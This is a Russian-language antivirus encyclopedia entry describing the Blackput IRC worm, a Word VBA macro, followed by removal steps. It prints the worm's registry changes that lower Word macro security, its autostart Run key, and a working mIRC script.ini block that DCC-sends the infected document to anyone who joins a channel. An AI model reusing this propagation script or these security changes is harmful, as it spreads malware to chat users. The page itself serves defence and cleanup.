IRC-Worm.MSWord.Blackput

Материал из Total Malware Info

Перейти к: навигация, поиск

IRC-Worm.MSWord.Blackput Червь распространяющий себя через IRC. Является макросом Visual Basic for Applications. Имеет размер 2 993 байта.

Инсталляция

Изменяет значение параметра в ключе реестра: 

[HKCU\Software\Microsoft\Office\9.0\Word\Security]
“Level”=”1”

Создает файл: 

c:\blackout.vxd

в который записывает свое тело.

Для автоматического запуска своего тела при каждой последующей загрузке Windows червь добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра: 

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
“blackout”=”c:\blackout.vbs”

Деструктивная активность

Создает файл: 

c:\blackout.vbs

в который записывает подпрограмму заражения документов Microsoft Word, написанную на Visual Basic Script и запускает ее. При запуске данный файл заражает все файлы с расширением .doc в папке 

c:\mydocu~1\

при заражении скрипт загружает программный модуль Visual Basic for Applications для текущего документа из файла 

c:\blackout.vxd

После этого зараженный документ копируется как: 

c:\readme.txt.doc

Создает ключ реестра: 

[HKLM\Software\Blackout]

Проверяет существование файла: 

c:\mirc\mirc32.exe

если такой файл существует, записывает в файл c:\mirc\script.ini следующие строки: 

[script]
n0=on 1:Join:#: {
n1=/if ($nick == $me ) {Halt}
n2=/DCC Send (c:\readme.txt.doc)
n3=/Clear
n4=/MOTD
n5=}

эти же самые строки червь в случае отсутствия вышеупомянутого файла так же пытается записать в следующий файл: 

c:\progra~1\mirc\script.ini

Данный текст является скриптом для программы mIRC, который заставляет ее разсылать код червя всем присоединяющимся к каналу пользователям используя сервис DCC.

Периодически используя помошника Microsoft Office отображает следующее сообщение: 

“This goes out to the people in the power companies!!!”

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  2. Удалить параметр в ключе реестра: (как работать с реестром?):
    3. [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
“blackout”=”c:\blackout.vbs”
  3. Удалить ключ реестра: (как работать с реестром?):
    4. [HKLM\Software\Blackout]
  4. Удалить файлы:
    5. c:\blackout.vxd
c:\blackout.vbs
c:\readme.txt.doc
  5. Проверить настройки безопасности Microsoft Word.
  6. Удалить следующие строки из файла script.ini в папке, где установлен клиент mIRC
    7. [script]
n0=on 1:Join:#: {
n1=/if ($nick == $me ) {Halt}
n2=/DCC Send (c:\readme.txt.doc)
n3=/Clear
n4=/MOTD
n5=}
Источник — «http://www.totalmalwareinfo.com/rus/IRC-Worm.MSWord.Blackput»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.